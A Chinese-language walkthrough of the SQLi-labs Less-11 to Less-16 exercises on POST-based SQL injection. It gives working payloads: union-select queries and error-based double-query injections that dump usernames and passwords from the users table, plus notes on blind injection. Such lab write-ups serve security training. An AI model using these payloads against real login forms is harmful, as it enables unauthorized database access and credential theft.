-
Less-11
从这题开始,数据提交方式变成post
首先burp抓个包看看字段名
Less-11-1.png
发现字段名uname和passwd,设置uname字段名为0',发现报错
Less-11-2.png
单字符型注入,剩下和Less-1一样,通过order by语句查询出查询结果有两列,构造payload:
uname=0' union select group_concat(username),group_concat(password) from users#&passwd=&submit=Submit
Less-11-3.png
注入成功
-
Less-12
判断注入类型,为双字符注入,并且有一个括号:
Less-12-1.png
将上面payload中单引号改为")即可:
uname=0") union select group_concat(username),group_concat(password) from users#&passwd=&submit=Submit
Less-12-2.png
注入成功
-
Less-13
判断注入类型,单字符注入,并有一个括号
Less-13-1.png
提交参数后无回显,只有登录成功,登录失败和mysql报错
考虑盲注(Less-8/9)和双查询注入(Less-5)
盲注太麻烦,所以尝试双查询注入
构造payload:
uname=0') union select count(*),concat((select password from users limit 1,1),floor(rand()*2))a from users group by a#&passwd=&submit=Submit
Less-13-2.png
注入成功
- Less-14
同样先判断注入类型,双字符注入,无回显
同Less-13双查询注入,构造payload:
uname=1" union select count(*),concat((select password from users limit 1,1),floor(rand()*2))a from users group by a#&submit=Submit&passwd=0
Less-14-1.png
注入成功
- Less-15/16
布尔/时间盲注
和Less-8/9一样只是提交方式换成post了
Less-15注入类型是单引号
Less-16注入类型是双引号,并有一个括号
多试几次就出来了
不贴图了(懒
网友评论